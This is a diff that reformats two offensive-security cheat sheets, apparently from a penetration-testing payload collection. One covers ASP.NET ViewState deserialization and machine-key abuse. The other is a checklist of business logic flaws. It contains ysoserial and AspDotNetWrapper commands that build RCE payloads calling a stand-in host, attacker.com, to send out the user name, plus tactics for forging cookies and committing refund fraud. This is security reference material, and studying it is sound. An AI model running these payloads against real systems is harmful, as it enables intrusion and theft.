Markdown Linting - API, Business Logic, Clickjacking

Author: swisskyrepo

API Key Leaks/IIS-Machine-Keys.md

@@ -15,7 +15,6 @@
 * [Edit Cookies With The Machine Key](#edit-cookies-with-the-machine-key)
 * [References](#references)
 
-
 ## Viewstate Format
 
 ViewState in IIS is a technique used to retain the state of web controls between postbacks in ASP.NET applications. It stores data in a hidden field on the page, allowing the page to maintain user input and other state information.
@@ -29,26 +28,25 @@ ViewState in IIS is a technique used to retain the state of web controls between
 By default until Sept 2014, the `enableViewStateMac` property was to set to `False`.
 Usually unencrypted viewstate are starting with the string `/wEP`.
 
-
 ## Machine Key Format And Locations
 
-A machineKey in IIS is a configuration element in ASP.NET that specifies cryptographic keys and algorithms used for encrypting and validating data, such as view state and forms authentication tokens. It ensures consistency and security across web applications, especially in web farm environments. 
+A machineKey in IIS is a configuration element in ASP.NET that specifies cryptographic keys and algorithms used for encrypting and validating data, such as view state and forms authentication tokens. It ensures consistency and security across web applications, especially in web farm environments.
 
 The format of a machineKey is the following.
 
 ```xml
 <machineKey validationKey="[String]"  decryptionKey="[String]" validation="[SHA1 (default) | MD5 | 3DES | AES | HMACSHA256 | HMACSHA384 | HMACSHA512 | alg:algorithm_name]"  decryption="[Auto (default) | DES | 3DES | AES | alg:algorithm_name]" />
 ```
 
-The `validationKey` attribute specifies a hexadecimal string used to validate data, ensuring it hasn't been tampered with. 
+The `validationKey` attribute specifies a hexadecimal string used to validate data, ensuring it hasn't been tampered with.
 
-The `decryptionKey` attribute provides a hexadecimal string used to encrypt and decrypt sensitive data. 
+The `decryptionKey` attribute provides a hexadecimal string used to encrypt and decrypt sensitive data.
 
-The `validation` attribute defines the algorithm used for data validation, with options like SHA1, MD5, 3DES, AES, and HMACSHA256, among others. 
+The `validation` attribute defines the algorithm used for data validation, with options like SHA1, MD5, 3DES, AES, and HMACSHA256, among others.
 
 The `decryption` attribute specifies the encryption algorithm, with options like Auto, DES, 3DES, and AES, or you can specify a custom algorithm using alg:algorithm_name.
 
-The following example of a machineKey is from Microsoft documentation (https://docs.microsoft.com/en-us/iis/troubleshoot/security-issues/troubleshooting-forms-authentication).
+The following example of a machineKey is from [Microsoft documentation](https://docs.microsoft.com/en-us/iis/troubleshoot/security-issues/troubleshooting-forms-authentication).
 
 ```xml
 <machineKey validationKey="87AC8F432C8DB844A4EFD024301AC1AB5808BEE9D1870689B63794D33EE3B55CDB315BB480721A107187561F388C6BEF5B623BF31E2E725FC3F3F71A32BA5DFC" decryptionKey="E001A307CCC8B1ADEA2C55B1246CDCFE8579576997FF92E7" validation="SHA1" />
@@ -62,11 +60,10 @@ Common locations of **web.config** / **machine.config**
 * 64-bits
     * `C:\Windows\Microsoft.NET\Framework64\v4.0.30319\config\machine.config`
     * `C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\machine.config`
-* in the registry when **AutoGenerate** is enabled (extract with https://gist.github.com/irsdl/36e78f62b98f879ba36f72ce4fda73ab)
+* in the registry when **AutoGenerate** is enabled (extract with [irsdl/machineKeyFinder.aspx](https://gist.github.com/irsdl/36e78f62b98f879ba36f72ce4fda73ab))
     * `HKEY_CURRENT_USER\Software\Microsoft\ASP.NET\4.0.30319.0\AutoGenKeyV4`  
     * `HKEY_CURRENT_USER\Software\Microsoft\ASP.NET\2.0.50727.0\AutoGenKey`
 
-
 ## Identify Known Machine Key
 
 Try multiple machine keys from known products, Microsoft documentation, or other part of the Internet.
@@ -115,43 +112,42 @@ List of interesting machine keys to use:
 * [isclayton/viewstalker/MachineKeys2.txt](https://raw.githubusercontent.com/isclayton/viewstalker/main/MachineKeys2.txt)
 * [blacklanternsecurity/badsecrets/aspnet_machinekeys.txt](https://raw.githubusercontent.com/blacklanternsecurity/badsecrets/dev/badsecrets/resources/aspnet_machinekeys.txt)
 
-
 ## Decode ViewState
 
 * [BApp Store > ViewState Editor](https://portswigger.net/bappstore/ba17d9fb487448b48368c22cb70048dc) - ViewState Editor is an extension that allows you to view and edit the structure and contents of V1.1 and V2.0 ASP view state data.
 * [0xacb/viewgen](https://github.com/0xacb/viewgen)
+
     ```powershell
-    $ viewgen --decode --check --webconfig web.config --modifier CA0B0334 "zUylqfbpWnWHwPqet3cH5Prypl94LtUPcoC7ujm9JJdLm8V7Ng4tlnGPEWUXly+CDxBWmtOit2HY314LI8ypNOJuaLdRfxUK7mGsgLDvZsMg/MXN31lcDsiAnPTYUYYcdEH27rT6taXzDWupmQjAjraDueY="
+    viewgen --decode --check --webconfig web.config --modifier CA0B0334 "zUylqfbpWnWHwPqet3cH5Prypl94LtUPcoC7ujm9JJdLm8V7Ng4tlnGPEWUXly+CDxBWmtOit2HY314LI8ypNOJuaLdRfxUK7mGsgLDvZsMg/MXN31lcDsiAnPTYUYYcdEH27rT6taXzDWupmQjAjraDueY="
     ```
 
-
 ## Generate ViewState For RCE
 
-First you need to decode the Viewstate to know if the MAC and the encryption are enabled. 
+First you need to decode the Viewstate to know if the MAC and the encryption are enabled.
 
-**Requirements**
+**Requirements**:
 
 * `__VIEWSTATE`
 * `__VIEWSTATEGENERATOR`
 
-
 ### MAC Is Not Enabled
 
 ```ps1
 ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/:UserName"
 ```
 
-
 ### MAC Is Enabled And Encryption Is Disabled
 
-* Find the machine key (validationkey) using `badsecrets`, `viewstalker`, `AspDotNetWrapper.exe` or `viewgen` 
+* Find the machine key (validationkey) using `badsecrets`, `viewstalker`, `AspDotNetWrapper.exe` or `viewgen`
+
     ```ps1
     AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata /wEPDwUKLTkyMTY0MDUxMg9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRkbdrqZ4p5EfFa9GPqKfSQRGANwLs= --purpose=viewstate  --valalgo=sha1 --decalgo=aes --modifier=CA0B0334 --macdecode --legacy
     # --modifier = `__VIEWSTATEGENERATOR` parameter value
     # --encrypteddata = `__VIEWSTATE` parameter value of the target application
     ```
 
 * Then generate a ViewState using [pwntester/ysoserial.net](https://github.com/pwntester/ysoserial.net), both `TextFormattingRunProperties` and `TypeConfuseDelegate` gadgets can be used.
+
     ```ps1
     .\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/:UserName" --generator=CA0B0334 --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45"
     .\ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "powershell.exe -c nslookup http://attacker.com" --generator=3E92B2D6 --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45"
@@ -160,29 +156,29 @@ ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "power
     # --validationkey = validation key from the previous command
     ```
 
-
 ### MAC Is Enabled And Encryption Is Enabled
 
 Default validation algorithm is `HMACSHA256` and the default decryption algorithm is `AES`.
 
-If the `__VIEWSTATEGENERATOR` is missing but the application uses .NET Framework version 4.0 or below, you can use the root of the app (e.g: `--apppath="/testaspx/"`). 
+If the `__VIEWSTATEGENERATOR` is missing but the application uses .NET Framework version 4.0 or below, you can use the root of the app (e.g: `--apppath="/testaspx/"`).
 
 * **.NET Framework < 4.5**, ASP.NET always accepts an unencrypted `__VIEWSTATE` if you remove the `__VIEWSTATEENCRYPTED` parameter from the request
+
     ```ps1
     .\ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "echo 123 > c:\windows\temp\test.txt" --apppath="/testaspx/" --islegacy --validationalg="SHA1" --validationkey="70DBADBFF4B7A13BE67DD0B11B177936F8F3C98BCE2E0A4F222F7A769804D451ACDB196572FFF76106F33DCEA1571D061336E68B12CF0AF62D56829D2A48F1B0" --isdebug
     ```
 
 * **.NET Framework > 4.5**, the machineKey has the property: `compatibilityMode="Framework45"`
+
     ```ps1
     .\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "echo 123 > c:\windows\temp\test.txt" --path="/somepath/testaspx/test.aspx" --apppath="/testaspx/" --decryptionalg="AES" --decryptionkey="34C69D15ADD80DA4788E6E3D02694230CF8E9ADFDA2708EF43CAEF4C5BC73887" --validationalg="HMACSHA256" --validationkey="70DBADBFF4B7A13BE67DD0B11B177936F8F3C98BCE2E0A4F222F7A769804D451ACDB196572FFF76106F33DCEA1571D061336E68B12CF0AF62D56829D2A48F1B0"
     ```
 
-
 ## Edit Cookies With The Machine Key
 
 If you have the `machineKey` but the viewstate is disabled.
 
-ASP.net Forms Authentication Cookies : https://github.com/liquidsec/aspnetCryptTools
+ASP.net Forms Authentication Cookies : [liquidsec/aspnetCryptTools](https://github.com/liquidsec/aspnetCryptTools)
 
 ```powershell
 # decrypt cookie
@@ -192,11 +188,10 @@ $ AspDotNetWrapper.exe --keypath C:\MachineKey.txt --cookie XXXXXXX_XXXXX-XXXXX
 $ AspDotNetWrapper.exe --decryptDataFilePath C:\DecryptedText.txt
 ```
 
-
 ## References
 
 * [Deep Dive into .NET ViewState Deserialization and Its Exploitation - Swapneil Kumar Dash - October 22, 2019](https://swapneildash.medium.com/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817)
 * [Exploiting Deserialisation in ASP.NET via ViewState - Soroush Dalili - April 23, 2019](https://soroush.me/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)
 * [Exploiting ViewState Deserialization using Blacklist3r and YSoSerial.Net - Claranet - June 13, 2019](https://www.claranet.com/us/blog/2019-06-13-exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserialnet)
 * [Project Blacklist3r - @notsosecure - November 23, 2018](https://www.notsosecure.com/project-blacklist3r/)
-* [View State, The Unpatchable IIS Forever Day Being Actively Exploited - Zeroed - July 21, 2024](https://zeroed.tech/blog/viewstate-the-unpatchable-iis-forever-day-being-actively-exploited/)
+* [View State, The Unpatchable IIS Forever Day Being Actively Exploited - Zeroed - July 21, 2024](https://zeroed.tech/blog/viewstate-the-unpatchable-iis-forever-day-being-actively-exploited/)

Business Logic Errors/README.md

@@ -2,7 +2,6 @@
 
 > Business logic errors, also known as business logic flaws, are a type of application vulnerability that stems from the application's business logic, which is the part of the program that deals with real-world business rules and processes. These rules could include things like pricing models, transaction limits, or the sequences of operations that need to be followed in a multi-step process.
 
-
 ## Summary
 
 * [Methodology](#methodology)
@@ -16,7 +15,6 @@
     * [Thread Comment Testing](#thread-comment-testing)
 * [References](#references)
 
-
 ## Methodology
 
 Unlike other types of security vulnerabilities like SQL injection or cross-site scripting (XSS), business logic errors do not rely on problems in the code itself (like unfiltered user input). Instead, they take advantage of the normal, intended functionality of the application, but use it in ways that the developer did not anticipate and that have undesired consequences.
@@ -32,7 +30,6 @@ Common examples of Business Logic Errors.
 * Investigate the possibility of posting reviews impersonating other users.
 * Attempt Cross-Site Request Forgery (CSRF) on this feature, as it's frequently unprotected by tokens.
 
-
 ### Discount Code Feature Testing
 
 * Try to apply the same discount code multiple times to assess if it's reusable.
@@ -41,17 +38,14 @@ Common examples of Business Logic Errors.
 * Test for vulnerabilities from missing input sanitization such as XSS, SQL Injection on this feature.
 * Attempt to apply discount codes to non-discounted items by manipulating the server-side request.
 
-
 ### Delivery Fee Manipulation
 
 * Experiment with negative values for delivery charges to see if it reduces the final amount.
 * Evaluate if free delivery can be activated by modifying parameters.
 
-
 ### Currency Arbitrage
 
 * Attempt to pay in one currency, for example, USD, and request a refund in another, like EUR. The difference in conversion rates could result in a profit.
-    
 
 ### Premium Feature Exploitation
 
@@ -60,32 +54,28 @@ Common examples of Business Logic Errors.
 * Look for true/false values in requests/responses that validate premium access. Use tools like Burp's Match & Replace to alter these values for unauthorized premium access.
 * Review cookies or local storage for variables validating premium access.
 
-
 ### Refund Feature Exploitation
 
 * Purchase a product, ask for a refund, and see if the product remains accessible.
 * Look for opportunities for currency arbitrage.
 * Submit multiple cancellation requests for a subscription to check the possibility of multiple refunds.
 
-
 ### Cart/Wishlist Exploitation
 
 * Test the system by adding products in negative quantities, along with other products, to balance the total.
 * Try to add more of a product than is available.
 * Check if a product in your wishlist or cart can be moved to another user's cart or removed from it.
 
-
 ### Thread Comment Testing
 
 * Check if there's a limit to the number of comments on a thread.
 * If a user can only comment once, use race conditions to see if multiple comments can be posted.
 * If the system allows comments by verified or privileged users, try to mimic these parameters and see if you can comment as well.
 * Attempt to post comments impersonating other users.
 
-
 ## References
 
-- [Business Logic Vulnerabilities - PortSwigger - 2024](https://portswigger.net/web-security/logic-flaws)
-- [Business Logic Vulnerability - OWASP - 2024](https://owasp.org/www-community/vulnerabilities/Business_logic_vulnerability)
-- [CWE-840: Business Logic Errors - CWE - March 24, 2011](https://cwe.mitre.org/data/definitions/840.html)
-- [Examples of Business Logic Vulnerabilities - PortSwigger - 2024](https://portswigger.net/web-security/logic-flaws/examples)
+* [Business Logic Vulnerabilities - PortSwigger - 2024](https://portswigger.net/web-security/logic-flaws)
+* [Business Logic Vulnerability - OWASP - 2024](https://owasp.org/www-community/vulnerabilities/Business_logic_vulnerability)
+* [CWE-840: Business Logic Errors - CWE - March 24, 2011](https://cwe.mitre.org/data/definitions/840.html)
+* [Examples of Business Logic Vulnerabilities - PortSwigger - 2024](https://portswigger.net/web-security/logic-flaws/examples)